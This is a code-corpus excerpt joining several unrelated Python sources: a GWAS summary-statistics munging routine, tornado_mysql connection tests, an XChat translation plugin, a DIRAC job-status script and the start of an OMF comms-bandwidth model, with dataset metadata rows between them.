if args.out is None and (write_out or new_log):
raise ValueError('The --out flag is required.')
START_TIME = time.time()
if new_log:
logging.basicConfig(format='%(asctime)s %(message)s', filename=args.out + '.log', filemode='w', level=logging.INFO,datefmt='%Y/%m/%d %I:%M:%S %p')
if not args.stdout_off:
logging.getLogger().addHandler(logging.StreamHandler()) # prints to console
try:
if args.sumstats is None and args.input_datgen is None:
raise ValueError('The --sumstats flag is required.')
if args.no_alleles and args.merge_alleles:
raise ValueError(
'--no-alleles and --merge-alleles are not compatible.')
if args.daner and args.daner_n:
raise ValueError('--daner and --daner-n are not compatible. Use --daner for sample ' +
'size from FRQ_A/FRQ_U headers, use --daner-n for values from Nca/Nco columns')
if write_out:
defaults = vars(parser.parse_args(''))
opts = vars(args)
non_defaults = [x for x in opts.keys() if opts[x] != defaults[x]]
header = allele_info.MASTHEAD
header += "Call: \n"
header += './munge_sumstats.py \\\n'
options = ['--'+x.replace('_','-')+' '+str(opts[x])+' \\' for x in non_defaults]
header += '\n'.join(options).replace('True','').replace('False','')
header = header[0:-1]+'\n'
logging.info(header)
file_cnames = read_header(args.sumstats) if args.input_datgen is None else args.cnames # note keys not cleaned
flag_cnames, signed_sumstat_null = parse_flag_cnames(args)
if args.ignore:
ignore_cnames = [clean_header(x) for x in args.ignore.split(',')]
else:
ignore_cnames = []
# remove LOG_ODDS, BETA, Z, OR from the default list
if args.signed_sumstats is not None or args.a1_inc:
mod_default_cnames = {x: default_cnames[
x] for x in default_cnames if default_cnames[x] not in null_values}
else:
mod_default_cnames = default_cnames
cname_map = get_cname_map(
flag_cnames, mod_default_cnames, ignore_cnames)
if args.daner:
            frq_u = [x for x in file_cnames if x.startswith('FRQ_U_')][0]
            frq_a = [x for x in file_cnames if x.startswith('FRQ_A_')][0]
N_cas = float(frq_a[6:])
N_con = float(frq_u[6:])
logging.info(
'Inferred that N_cas = {N1}, N_con = {N2} from the FRQ_[A/U] columns.'.format(N1=N_cas, N2=N_con))
args.N_cas = N_cas
args.N_con = N_con
# drop any N, N_cas, N_con or FRQ columns
for c in ['N', 'N_CAS', 'N_CON', 'FRQ']:
                for d in [x for x in cname_map if cname_map[x] == c]:
del cname_map[d]
cname_map[frq_u] = 'FRQ'
if args.daner_n:
            frq_u = [x for x in file_cnames if x.startswith('FRQ_U_')][0]
cname_map[frq_u] = 'FRQ'
try:
dan_cas = clean_header(file_cnames[file_cnames.index('Nca')])
except ValueError:
raise ValueError('Could not find Nca column expected for daner-n format')
try:
dan_con = clean_header(file_cnames[file_cnames.index('Nco')])
except ValueError:
raise ValueError('Could not find Nco column expected for daner-n format')
cname_map[dan_cas] = 'N_CAS'
cname_map[dan_con] = 'N_CON'
cname_translation = {x: cname_map[clean_header(x)] for x in file_cnames if
clean_header(x) in cname_map} # note keys not cleaned
cname_description = {
x: describe_cname[cname_translation[x]] for x in cname_translation}
if args.signed_sumstats is None and not args.a1_inc:
sign_cnames = [
x for x in cname_translation if cname_translation[x] in null_values]
if len(sign_cnames) > 1:
raise ValueError(
'Too many signed sumstat columns. Specify which to ignore with the --ignore flag.')
if len(sign_cnames) == 0:
raise ValueError(
'Could not find a signed summary statistic column.')
sign_cname = sign_cnames[0]
signed_sumstat_null = null_values[cname_translation[sign_cname]]
cname_translation[sign_cname] = 'SIGNED_SUMSTAT'
else:
sign_cname = 'SIGNED_SUMSTAT'
# check that we have all the columns we need
if not args.a1_inc:
req_cols = ['SNP', 'P', 'SIGNED_SUMSTAT']
else:
req_cols = ['SNP', 'P']
for c in req_cols:
if c not in cname_translation.values():
raise ValueError('Could not find {C} column.'.format(C=c))
# check aren't any duplicated column names in mapping
for field in cname_translation:
numk = list(file_cnames).count(field)
if numk > 1:
raise ValueError('Found {num} columns named {C}'.format(C=field,num=str(numk)))
# check multiple different column names don't map to same data field
for head in cname_translation.values():
numc = list(cname_translation.values()).count(head)
if numc > 1:
raise ValueError('Found {num} different {C} columns'.format(C=head,num=str(numc)))
if (not args.n_value) and (not args.N) and (not (args.N_cas and args.N_con)) and ('N' not in cname_translation.values()) and\
(any(x not in cname_translation.values() for x in ['N_CAS', 'N_CON'])):
raise ValueError('Could not determine N.')
if ('N' in cname_translation.values() or all(x in cname_translation.values() for x in ['N_CAS', 'N_CON']))\
and 'NSTUDY' in cname_translation.values():
nstudy = [
x for x in cname_translation if cname_translation[x] == 'NSTUDY']
for x in nstudy:
del cname_translation[x]
if not args.no_alleles and not all(x in cname_translation.values() for x in ['A1', 'A2']):
raise ValueError('Could not find A1/A2 columns.')
logging.info('Interpreting column names as follows:')
logging.info('\n'.join([x + ':\t' + cname_description[x]
for x in cname_description]) + '\n')
if args.merge_alleles:
logging.info(
'Reading list of SNPs for allele merge from {F}'.format(F=args.merge_alleles))
(openfunc, compression) = get_compression(args.merge_alleles)
merge_alleles = pd.read_csv(args.merge_alleles, compression=compression, header=0,
delim_whitespace=True, na_values='.')
if any(x not in merge_alleles.columns for x in ["SNP", "A1", "A2"]):
raise ValueError(
'--merge-alleles must have columns SNP, A1, A2.')
logging.info(
'Read {N} SNPs for allele merge.'.format(N=len(merge_alleles)))
merge_alleles['MA'] = (
merge_alleles.A1 + merge_alleles.A2).apply(lambda y: y.upper())
merge_alleles.drop(
[x for x in merge_alleles.columns if x not in ['SNP', 'MA']], axis=1, inplace=True)
else:
merge_alleles = None
# figure out which columns are going to involve sign information, so we can ensure
# they're read as floats
signed_sumstat_cols = [k for k,v in cname_translation.items() if v=='SIGNED_SUMSTAT']
if args.input_datgen is not None:
dat_gen = [sub_df[list(cname_translation.keys())] for sub_df in args.input_datgen]
else:
(openfunc, compression) = get_compression(args.sumstats)
dat_gen = pd.read_csv(args.sumstats, delim_whitespace=True, header=0,
compression=compression, usecols=cname_translation.keys(),
na_values=['.', 'NA','NaN'], iterator=True, chunksize=args.chunksize,
dtype={c:np.float64 for c in signed_sumstat_cols})
dat_gen = list(dat_gen)
dat = parse_dat(dat_gen, cname_translation, merge_alleles, args)
if len(dat) == 0:
raise ValueError('After applying filters, no SNPs remain.')
if args.n_value is not None:
logging.info('Adding uniform sample size {} to summary statistics.'.format(int(args.n_value)))
dat['N'] = int(args.n_value)
old = len(dat)
dat = dat.drop_duplicates(subset='SNP').reset_index(drop=True)
new = len(dat)
logging.info('Removed {M} SNPs with duplicated rs numbers ({N} SNPs remain).'.format(
M=old - new, N=new))
# filtering on N cannot be done chunkwise
dat = process_n(dat, args)
dat.P = p_to_z(dat.P, dat.N)
dat.rename(columns={'P': 'Z'}, inplace=True)
if not args.a1_inc:
logging.info(
check_median(dat.SIGNED_SUMSTAT, signed_sumstat_null, 0.1, sign_cname))
dat.Z *= (-1) ** (dat.SIGNED_SUMSTAT < signed_sumstat_null)
#dat.drop('SIGNED_SUMSTAT', inplace=True, axis=1)
# do this last so we don't have to worry about NA values in the rest of
# the program
if args.merge_alleles:
dat = allele_merge(dat, merge_alleles)
print_colnames = [
c for c in dat.columns if c in ['SNP', 'N', 'Z', 'A1', 'A2']]
if args.keep_maf and 'FRQ' in dat.columns:
print_colnames.append('FRQ')
signed_sumstats = [k for k,v in cname_translation.items() if v=='SIGNED_SUMSTAT']
assert len(signed_sumstats)==1
if args.keep_beta and signed_sumstats[0]=='BETA' and 'SIGNED_SUMSTAT' in dat.columns:
print_colnames.append('BETA')
dat.rename(columns={'SIGNED_SUMSTAT':'BETA'}, inplace=True)
if args.keep_se and 'SE' in dat.columns:
print_colnames.append('SE')
if write_out:
out_fname = args.out + '.sumstats'
dat=dat[dat.N.notnull()] # added
msg = 'Writing summary statistics for {M} SNPs ({N} with nonmissing N) to {F}.'
logging.info(
msg.format(M=len(dat), F=out_fname + '.gz', N=dat.N.notnull().sum()))
dat.to_csv(out_fname, sep="\t", index=False,
columns=print_colnames, float_format='%.10f')
os.system('gzip -f {F}'.format(F=out_fname))
logging.info('Dropping snps with null values')
dat = dat[dat.N.notnull()]
logging.info('\nMetadata:')
dat = dat[dat.N.notnull()]
        CHISQ = np.square(dat.Z)
mean_chisq = CHISQ.mean()
logging.info('Mean chi^2 = ' + str(round(mean_chisq, 3)))
if mean_chisq < 1.02:
logging.info("WARNING: mean chi^2 may be too small.")
logging.info('Lambda GC = ' + str(round(CHISQ.median() / 0.4549, 3)))
logging.info('Max chi^2 = ' + str(round(CHISQ.max(), 3)))
logging.info('{N} Genome-wide significant SNPs (some may have been removed by filtering).'.format(N=(CHISQ > 29).sum()))
return dat
except Exception:
logging.info('\nERROR converting summary statistics:\n')
ex_type, ex, tb = sys.exc_info()
        logging.info(traceback.format_exc())
raise
finally:
logging.info('\nConversion finished at {T}'.format(T=time.ctime()))
logging.info('Total time elapsed: {T}'.format(
T=allele_info.sec_to_str(round(time.time() - START_TIME, 2))))
if __name__ == '__main__':
d = munge_sumstats(parser.parse_args(), write_out=True)
| gpl-3.0 | -8,876,316,338,793,550,000 | 38.220682 | 163 | 0.557286 | false |
mosquito/Tornado-MySQL | tornado_mysql/tests/test_connection.py | 4 | 2755 | import time
from tornado.testing import gen_test
from tornado import gen
import tornado_mysql
from tornado_mysql.tests import base
class TestConnection(base.PyMySQLTestCase):
@gen_test
def test_utf8mb4(self):
"""This test requires MySQL >= 5.5"""
arg = self.databases[0].copy()
arg['charset'] = 'utf8mb4'
conn = yield tornado_mysql.connect(**arg)
@gen_test
def test_largedata(self):
"""Large query and response (>=16MB)"""
cur = self.connections[0].cursor()
yield cur.execute("SELECT @@max_allowed_packet")
if cur.fetchone()[0] < 16*1024*1024 + 10:
print("Set max_allowed_packet to bigger than 17MB")
else:
t = 'a' * (16*1024*1024)
yield cur.execute("SELECT '" + t + "'")
assert cur.fetchone()[0] == t
@gen_test
def test_escape_string(self):
con = self.connections[0]
cur = con.cursor()
self.assertEqual(con.escape("foo'bar"), "'foo\\'bar'")
yield cur.execute("SET sql_mode='NO_BACKSLASH_ESCAPES'")
self.assertEqual(con.escape("foo'bar"), "'foo''bar'")
@gen_test
def test_autocommit(self):
con = self.connections[0]
self.assertFalse(con.get_autocommit())
cur = con.cursor()
yield cur.execute("SET AUTOCOMMIT=1")
self.assertTrue(con.get_autocommit())
yield con.autocommit(False)
self.assertFalse(con.get_autocommit())
yield cur.execute("SELECT @@AUTOCOMMIT")
self.assertEqual(cur.fetchone()[0], 0)
@gen_test
def test_select_db(self):
con = self.connections[0]
current_db = self.databases[0]['db']
other_db = self.databases[1]['db']
cur = con.cursor()
yield cur.execute('SELECT database()')
self.assertEqual(cur.fetchone()[0], current_db)
yield con.select_db(other_db)
yield cur.execute('SELECT database()')
self.assertEqual(cur.fetchone()[0], other_db)
@gen_test
def test_connection_gone_away(self):
"""
http://dev.mysql.com/doc/refman/5.0/en/gone-away.html
http://dev.mysql.com/doc/refman/5.0/en/error-messages-client.html#error_cr_server_gone_error
"""
con = self.connections[0]
cur = con.cursor()
yield cur.execute("SET wait_timeout=1")
time.sleep(2)
with self.assertRaises(tornado_mysql.OperationalError) as cm:
yield cur.execute("SELECT 1+1")
        # error occurs while reading, not writing, because of the socket buffer.
#self.assertEquals(cm.exception.args[0], 2006)
self.assertIn(cm.exception.args[0], (2006, 2013))
if __name__ == "__main__":
import unittest
unittest.main()
| mit | 2,432,940,451,073,849,300 | 31.411765 | 100 | 0.600363 | false |
cngo-github/translation-server | src/irc/queue/xchat/xchat-translator-2.7.5.py | 1 | 15038 | # -*- coding: utf-8 -*-
__module_name__ = "Xchat Translator"
__module_version__ = "-.-"
__module_description__ = "Performs translations from one language to another"
__module_author__ = "Chuong Ngo"
import xchat
import json
import socket
import select
DEFAULT_LANG = "en"
MAX_ERROR = 3
# Must be either True or False and the capitalization matters.
ECHO = False
SERVER_IP = "127.0.0.1"
SERVER_PORT = 4242
BUFFER_SIZE = 1024
TIMER = 100
ENABLE_DEFAULTLANG = False
LANGUAGES = {
'AFRIKAANS' : 'af',
'ALBANIAN' : 'sq',
'AMHARIC' : 'am',
'ARABIC' : 'ar',
'ARMENIAN' : 'hy',
'AZERBAIJANI' : 'az',
'BASQUE' : 'eu',
'BELARUSIAN' : 'be',
'BENGALI' : 'bn',
'BIHARI' : 'bh',
'BULGARIAN' : 'bg',
'BURMESE' : 'my',
'CATALAN' : 'ca',
'CHEROKEE' : 'chr',
'CHINESE' : 'zh',
'CHINESE_SIMPLIFIED' : 'zh-CN',
'CHINESE_TRADITIONAL' : 'zh-TW',
'CROATIAN' : 'hr',
'CZECH' : 'cs',
'DANISH' : 'da',
'DHIVEHI' : 'dv',
'DUTCH': 'nl',
'ENGLISH' : 'en',
'ESPERANTO' : 'eo',
'ESTONIAN' : 'et',
'FILIPINO' : 'tl',
'FINNISH' : 'fi',
'FRENCH' : 'fr',
'GALICIAN' : 'gl',
'GEORGIAN' : 'ka',
'GERMAN' : 'de',
'GREEK' : 'el',
'GUARANI' : 'gn',
'GUJARATI' : 'gu',
'HEBREW' : 'iw',
'HINDI' : 'hi',
'HUNGARIAN' : 'hu',
'ICELANDIC' : 'is',
'INDONESIAN' : 'id',
'INUKTITUT' : 'iu',
'IRISH' : 'ga',
'ITALIAN' : 'it',
'JAPANESE' : 'ja',
'KANNADA' : 'kn',
'KAZAKH' : 'kk',
'KHMER' : 'km',
'KOREAN' : 'ko',
'KURDISH': 'ku',
'KYRGYZ': 'ky',
'LAOTHIAN': 'lo',
'LATVIAN' : 'lv',
'LITHUANIAN' : 'lt',
'MACEDONIAN' : 'mk',
'MALAY' : 'ms',
'MALAYALAM' : 'ml',
'MALTESE' : 'mt',
'MARATHI' : 'mr',
'MONGOLIAN' : 'mn',
'NEPALI' : 'ne',
'NORWEGIAN' : 'no',
'ORIYA' : 'or',
'PASHTO' : 'ps',
'PERSIAN' : 'fa',
'POLISH' : 'pl',
'PORTUGUESE' : 'pt-PT',
'PUNJABI' : 'pa',
'ROMANIAN' : 'ro',
'RUSSIAN' : 'ru',
'SANSKRIT' : 'sa',
'SERBIAN' : 'sr',
'SINDHI' : 'sd',
'SINHALESE' : 'si',
'SLOVAK' : 'sk',
'SLOVENIAN' : 'sl',
'SPANISH' : 'es',
'SWAHILI' : 'sw',
'SWEDISH' : 'sv',
'TAJIK' : 'tg',
'TAMIL' : 'ta',
'TAGALOG' : 'tl',
'TELUGU' : 'te',
'THAI' : 'th',
'TIBETAN' : 'bo',
'TURKISH' : 'tr',
'UKRAINIAN' : 'uk',
'URDU' : 'ur',
'UZBEK' : 'uz',
'UIGHUR' : 'ug',
'VIETNAMESE' : 'vi',
'WELSH' : 'cy',
'YIDDISH' : 'yi'
}
LANG_CODES = dict((v,k) for (k,v) in LANGUAGES.items())
WATCHLIST = {}
CHANWATCHLIST = {}
IGNORELIST = {}
ACTIVE_JOBS = 0
TIMEOUT_HOOK = None
CONN = None
class Translator:
def translate(cls, channel, user, text, tgtLang = DEFAULT_LANG, echo = False, outgoing = False, srcLang = "auto", tgtTxt = None, echoTxt = None, kill = False, read = False):
global CONN
request = dict(Outgoing = outgoing, Channel = channel, User = user, Srctxt = text, Srclang = srcLang, Tgttxt = tgtTxt, Tgtlang = tgtLang, Echotxt = echoTxt, Echo = echo, Kill = kill, Read = read)
cls.connectToServer()
jsonStr = json.dumps(request).encode("utf-8")
CONN.send(jsonStr)
return None
translate = classmethod(translate)
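	# Illustrative request as serialized onto the socket (keys mirror the dict built
	# above; the values here are made up): {"Outgoing": false, "Channel": "#chan",
	# "User": "nick", "Srctxt": "bonjour", "Srclang": "auto", "Tgttxt": null,
	# "Tgtlang": "en", "Echotxt": null, "Echo": false, "Kill": false, "Read": false}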
def readResults(cls, userdata = None):
global TIMEOUT_HOOK
global WATCHLIST
global IGNORELIST
global ACTIVE_JOBS
request = dict(Outgoing = None, Channel = None, User = None, Srctxt = None, Srclang = None, Tgttxt = None, Tgtlang = None, Echotxt = None, Echo = False, Kill = False, Read = True)
jsonStr = json.dumps(request).encode("utf-8")
CONN.send(jsonStr)
result = json.loads(CONN.recv(BUFFER_SIZE).decode("utf-8"))
key = result["Channel"] + " " + result["User"]
user = result["User"]
if type(result) == dict:
if result["Outgoing"]:
pruser = "- " + user
txt = pruser + result["Tgttxt"]
xchat.command("say " + txt.encode("utf-8"))
if ECHO:
context = xchat.find_context(channel=result["Channel"])
txt = result["Echotxt"].encode("utf-8")
context.emit_print("Channel Message", "_[echo]", txt)
if WATCHLIST is not None and key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
cnt = cnt - 1
if src == "auto" and ENABLE_DEFAULTLANG:
src = result["Srclang"]
WATCHLIST[key] = (dest, src, cnt)
elif user is not None and user != "" and ENABLE_DEFAULTLANG:
dest = DEFAULT_LANG
src = result["Srclang"]
cnt = 0
WATCHLIST[key] = (dest, src, cnt)
pass
elif result["Srclang"] != result["Tgtlang"] and user is not None and user != "":
context = xchat.find_context(channel=result["Channel"])
txt = result["Tgttxt"].encode("utf-8")
context.emit_print("Channel Message", "_[%s]" %(result["User"]), txt)
if WATCHLIST is not None and key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
cnt = cnt - 1
if src == "auto" and ENABLE_DEFAULTLANG:
src = result["Srclang"]
WATCHLIST[key] = (dest, src, cnt)
pass
if result["Srclang"] == result["Tgtlang"] and user is not None and user != "":
cnt = 1
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
cnt = cnt + 1
WATCHLIST[key] = (dest, src, cnt)
else:
dest = DEFAULT_LANG
src = result["Srclang"]
cnt = 1
WATCHLIST[key] = (dest, src, cnt)
if cnt >= MAX_ERROR:
WATCHLIST.pop(key, None)
IGNORELIST[key] = (dest, src)
ACTIVE_JOBS -= 1
if ACTIVE_JOBS <= 0:
xchat.unhook(TIMEOUT_HOOK)
TIMEOUT_HOOK = None
cls.closeConnection()
return None
readResults = classmethod(readResults)
def connectToServer(cls, ip = SERVER_IP, port = SERVER_PORT):
global CONN
if CONN is None:
CONN = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
CONN.connect((ip, port))
return None
connectToServer = classmethod(connectToServer)
def closeConnection(cls):
global CONN
global ACTIVE_JOBS
		request = dict(Outgoing = None, Channel = None, User = None, Srctxt = None, Srclang = None, Tgttxt = None, Tgtlang = None, Echotxt = None, Echo = False, Kill = True, Read = False)
jsonStr = json.dumps(request).encode("utf-8")
CONN.send(jsonStr)
CONN = None
ACTIVE_JOBS = 0
return None
closeConnection = classmethod(closeConnection)
def findLangCode(language):
lang = language.upper()
if lang in LANGUAGES:
return LANGUAGES[lang]
if lang.lower() in LANG_CODES:
return lang.lower()
return None
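# For example, findLangCode('French') and findLangCode('fr') both return 'fr';
# names or codes not present in LANGUAGES/LANG_CODES return None.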
def addTranslationJob(text, targetLang, srcLang, channel, user, echo = False, outgoing = False):
global TIMEOUT_HOOK
global TIMER
global ACTIVE_JOBS
ACTIVE_JOBS += 1
Translator.translate(channel, user, text, targetLang, echo, outgoing, srcLang)
if TIMEOUT_HOOK is None:
TIMEOUT_HOOK = xchat.hook_timer(TIMER, Translator.readResults)
return None
def removeUser(key):
global WATCHLIST
global IGNORELIST
if WATCHLIST is not None and WATCHLIST.pop(key, None) is not None:
xchat.prnt("Removed " + key + " from the watch list.")
if IGNORELIST is not None and IGNORELIST.pop(key, None) is not None:
xchat.prnt("Removed " + key + " from the ignore list.")
return None
def quitRemoveUser(word, word_eol, userdata):
channel = xchat.get_info("channel")
user = word[0]
if user is None:
return xchat.EAT_NONE
key = channel + " " + user.lower()
removeUser(key)
return xchat.EAT_NONE
xchat.hook_print("Quit", quitRemoveUser)
def kickRemoveUser(word, word_eol, userdata):
channel = xchat.get_info("channel")
user = word[1]
if user is None:
return xchat.EAT_NONE
key = channel + " " + user.lower()
removeUser(key)
return xchat.EAT_NONE
xchat.hook_print("Kick", kickRemoveUser)
def updateUserNick(word, word_eol, userdata):
channel = xchat.get_info("channel")
userOld = word[0]
userNew = word[1]
if userOld is None or userNew is None:
return xchat.EAT_NONE
userOld = userOld.lower()
userNew = userNew.lower()
key = channel + " " + userOld
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
if WATCHLIST.pop(key, None) is not None:
WATCHLIST[xchat.get_info("channel") + " " + userNew.lower()] = (dest, src, cnt)
xchat.prnt("Watching " + userNew + ", fomerly " + userOld)
return xchat.EAT_NONE
xchat.hook_print("Change Nick", updateUserNick)
def translateIncoming(word, word_eol, userdata):
channel = xchat.get_info("channel")
user = word[0].lower()
key = channel + " " + user
chanKey = channel + " " + channel
if key in WATCHLIST and not user.startswith("_["):
dest, src, cnt = WATCHLIST[key]
addTranslationJob(word_eol[1], dest, src, channel, user)
if chanKey in CHANWATCHLIST and not user.startswith("_["):
dest, src = CHANWATCHLIST[chanKey]
addTranslationJob(word_eol[1], dest, src, channel, user)
return xchat.EAT_NONE
xchat.hook_print("Channel Message", translateIncoming)
xchat.hook_print("Channel Msg Hilight", translateIncoming)
def translateOutgoing(word, word_eol, userdata):
if len(word) < 2:
return xchat.EAT_NONE
channel = xchat.get_info("channel")
user = word[0].lower()
key = channel + " " + user
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
if src != "auto":
addTranslationJob(word_eol[1], src, dest, channel, user, ECHO, True)
return xchat.EAT_ALL
key = key[:-1]
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
if src != "auto":
addTranslationJob(word_eol[1], src, dest, channel, user, ECHO, True)
return xchat.EAT_ALL
return xchat.EAT_NONE
xchat.hook_command('', translateOutgoing, help = "Triggers on all /say commands")
def addUser(word, word_eol, userdata):
global WATCHLIST
if len(word) < 2:
return xchat.EAT_ALL
user = word[1]
src = "auto"
dest = DEFAULT_LANG
if len(word) > 2 :
src = findLangCode(word[2])
if src is None:
xchat.prnt("The specified language is invalid.")
return xchat.EAT_ALL
pass
if len(word) > 3:
lang = findLangCode(word[3])
if lang is not None:
dest = lang
pass
key = xchat.get_info("channel") + " " + user.lower()
WATCHLIST[key] = (dest, src, 0)
xchat.prnt("Now watching user: " + user + ", source: " + src + ", target: " + dest)
return xchat.EAT_ALL
xchat.hook_command("ADDTR", addUser, help = "/ADDTR {user} {source_language} {target_language} - adds the specified user to the watchlist. If {source_language} and/or {target_language} is not specified, then 'auto' will be used for the {source_language} and the DEFAULT_LANG will be used for the {target_language}.")
def addChannel(word, word_eol, userdata):
global CHANWATCHLIST
channel = xchat.get_info("channel")
CHANWATCHLIST[channel + " " + channel] = (DEFAULT_LANG, "auto")
xchat.prnt("Now watching channel: " + channel)
return xchat.EAT_ALL
xchat.hook_command("ADDCHAN", addChannel, help = "/ADDCHAN - adds the current channel to the channel watch list")
def addIgnore(word, word_eol, userdata):
global IGNORELIST
if len(word) < 2:
return xchat.EAT_ALL
channel = xchat.get_info("channel")
user = word[1]
IGNORELIST[channel + " " + user] = (DEFAULT_LANG, "auto")
xchat.prnt("Now ignoring user: " + user)
return xchat.EAT_ALL
xchat.hook_command("ADDIG", addIgnore, help = "/ADDCHAN {user_nick} - adds the {user_nick} to the ignore list")
def manualRemoveUser(word, word_eol, userdata):
if len(word) < 2:
return xchat.EAT_ALL
user = word[1]
if user is None:
return xchat.EAT_ALL
removeUser(xchat.get_info("channel") + " " + user.lower())
return xchat.EAT_ALL
xchat.hook_command("RMTR", manualRemoveUser, help = "/RMTR {user_nick} - removes {user_nick} from the watch list for automatic translations.")
def removeChannel(word, word_eol, userdata):
channel = xchat.get_info("channel")
if CHANWATCHLIST.pop(channel + " " + channel, None) is not None:
xchat.prnt("Channel %s has been removed from the watch list." %channel)
return xchat.EAT_ALL
xchat.hook_command("RMCHAN", removeChannel, help = "/RMCHAN - removes the channel from the channel watch list for automatic translations.")
def removeIgnore(word, word_eol, userdata):
if len(word) < 2:
return xchat.EAT_ALL
user = word[1]
if IGNORELIST.pop(xchat.get_info("channel") + " " + user.lower(), None) is not None:
xchat.prnt("User %s has been removed from the ignore list." %user)
return xchat.EAT_ALL
xchat.hook_command("RMIG", removeIgnore, help = "/RMTR {user_nick} - removes {user_nick} from the ignore list.")
def translateAndSay(word, word_eol, userdata):
if len(word) < 3:
return xchat.EAT_ALL
lang = findLangCode(word[1])
if lang is None:
xchat.prnt("Invalid language name or code. Aborting translation.")
return xchat.EAT_ALL
addTranslationJob(word_eol[2], lang, "auto", xchat.get_info("channel"), None, ECHO, True)
return xchat.EAT_ALL
xchat.hook_command("TRSEND", translateAndSay, help="/TRSEND {dest_lang} {text} - translates the {text} into the {desk_lang} langugage.")
def translate(word, word_eol, userdata):
addTranslationJob(word_eol[2], word[1], "auto", xchat.get_info("channel"), word[0].lower())
return xchat.EAT_ALL
xchat.hook_command("TR", translate, help="/TR {dest_lang} {text} - translates the {text} into the {desk_lang} langugage.")
def printWatchList(word, word_eol, userdata):
xchat.prnt("Printing watch list (nick, channel, src, dest, error count)")
for key in WATCHLIST.keys():
channel, user = key.split(' ')
dest, src, cnt = WATCHLIST[key]
xchat.prnt("- " + user + " " + channel + " " + src + " " + dest + " " + str(cnt))
return xchat.EAT_ALL
xchat.hook_command("LSUSERS", printWatchList, help = "/LSUSERS - prints out all users on the watch list for automatic translations to the screen locally.")
def printChanWatchList(word, word_eol, userdata):
xchat.prnt("Printing channel watch list (nick, channel, src, dest)")
for key in CHANWATCHLIST.keys():
channel, user = key.split(' ')
dest, src = CHANWATCHLIST[key]
xchat.prnt("- " + user + " " + channel + " " + src + " " + dest)
return xchat.EAT_ALL
xchat.hook_command("LSCHAN", printChanWatchList, help = "/LSCHAN - prints out all channels on the channel watch list for automatic translations to the screen locally.")
def printIgnoreList(word, word_eol, userdata):
xchat.prnt("Printing ignore list (nick, channel, src, dest)")
for key in IGNORELIST.keys():
channel, user = key.split(' ')
dest, src = IGNORELIST[key]
xchat.prnt("- " + user + " " + channel + " " + src + " " + dest)
return xchat.EAT_ALL
xchat.hook_command("LSIG", printIgnoreList, help = "/LSUSERS - prints out all users on the ignore list.")
def initialize(word, word_eol, userdata):
global CONN
global ACTIVE_JOBS
global WATCHLIST
global TIMEOUT_HOOK
if TIMEOUT_HOOK is not None:
xchat.unhook(TIMEOUT_HOOK)
TIMEOUT_HOOK = None
if CONN is not None:
CONN.close()
CONN = None
ACTIVE_JOBS = 0
WATCHLIST = {}
xchat.prnt("Translator reinitialized")
return xchat.EAT_ALL
xchat.hook_command("TRINIT", initialize, help = "/TRINIT - reinitializes the plugin.")
def unload_plugin(userdata):
global TIMEOUT_HOOK
global CONN
if TIMEOUT_HOOK is not None:
xchat.unhook(TIMEOUT_HOOK)
TIMEOUT_HOOK = None
if CONN is not None:
Translator.closeConnection()
xchat.prnt("Translator is unloaded.")
return None
xchat.hook_unload(unload_plugin)
xchat.prnt("Translator is loaded.")
| mit | 1,971,687,278,613,201,400 | 25.853571 | 317 | 0.654941 | false |
Andrew-McNab-UK/DIRAC | Interfaces/scripts/dirac-wms-job-status.py | 7 | 2067 | #!/usr/bin/env python
########################################################################
# $HeadURL$
# File : dirac-wms-job-status
# Author : Stuart Paterson
########################################################################
"""
Retrieve status of the given DIRAC job
"""
__RCSID__ = "$Id$"
import os
import DIRAC
from DIRAC import exit as DIRACExit
from DIRAC.Core.Base import Script
from DIRAC.Core.Utilities.Time import toString, date, day
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'\nUsage:\n',
' %s [option|cfgfile] ... JobID ...' % Script.scriptName,
'\nArguments:\n',
' JobID: DIRAC Job ID' ] ) )
Script.registerSwitch( "f:", "File=", "Get status for jobs with IDs from the file" )
Script.registerSwitch( "g:", "JobGroup=", "Get status for jobs in the given group" )
Script.parseCommandLine( ignoreErrors = True )
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac, parseArguments
dirac = Dirac()
exitCode = 0
jobs = []
for key, value in Script.getUnprocessedSwitches():
if key.lower() in ( 'f', 'file' ):
if os.path.exists( value ):
jFile = open( value )
jobs += jFile.read().split()
jFile.close()
elif key.lower() in ( 'g', 'jobgroup' ):
jobDate = toString( date() - 30 * day )
# Choose jobs no more than 30 days old
result = dirac.selectJobs( jobGroup = value, date = jobDate )
if not result['OK']:
print "Error:", result['Message']
DIRACExit( -1 )
jobs += result['Value']
if len( args ) < 1 and not jobs:
Script.showHelp()
if len( args ) > 0:
jobs += parseArguments( args )
result = dirac.getJobStatus( jobs )
if result['OK']:
for job in result['Value']:
print 'JobID=' + str( job ),
for status in result['Value'][job].items():
print '%s=%s;' % status,
print
else:
exitCode = 2
print "ERROR: %s" % result['Message']
DIRAC.exit( exitCode )
| gpl-3.0 | -1,949,146,979,304,111,600 | 29.850746 | 95 | 0.54717 | false |
dpinney/omf | omf/models/commsBandwidth.py | 1 | 4260 | ''' Comms Bandwidth Model '''
import os, datetime, shutil
from os.path import join as pJoin
import networkx as nx
from omf import comms
from omf.models import __neoMetaModel__
from omf.models.__neoMetaModel__ import *
# Model metadata:
tooltip = "Calculate the bandwidth requirements for a communications system on a feeder"
modelName, template = __neoMetaModel__.metadata(__file__)
hidden = False
def work(modelDir, inputDict):
outData = {}
feederName = [x for x in os.listdir(modelDir) if x.endswith('.omd')][0][:-4]
inputDict['feederName1'] = feederName
feederPath = pJoin(modelDir,feederName+'.omd')
	#delete previously saved omd/omc files so storage doesn't blow up - may need to adjust in future for editing
#for file in os.listdir(modelDir):
# if file.endswith(".omc") or file.endswith(".omd"):
# os.remove(pJoin(modelDir, file))
#shutil.copyfile(pJoin(__neoMetaModel__._omfDir, 'static', 'publicFeeders', feederName+'.omd'), pJoin(modelDir, feederName+'.omd'))
feeder = comms.createGraph(feederPath)
#set the omc objects
comms.setSmartMeters(feeder)
comms.setRFCollectors(feeder)
comms.setFiber(feeder)
comms.setRF(feeder)
#Calculate the bandwidth capacities
comms.setSmartMeterBandwidth(feeder, packetSize=int(inputDict['meterPacket']))
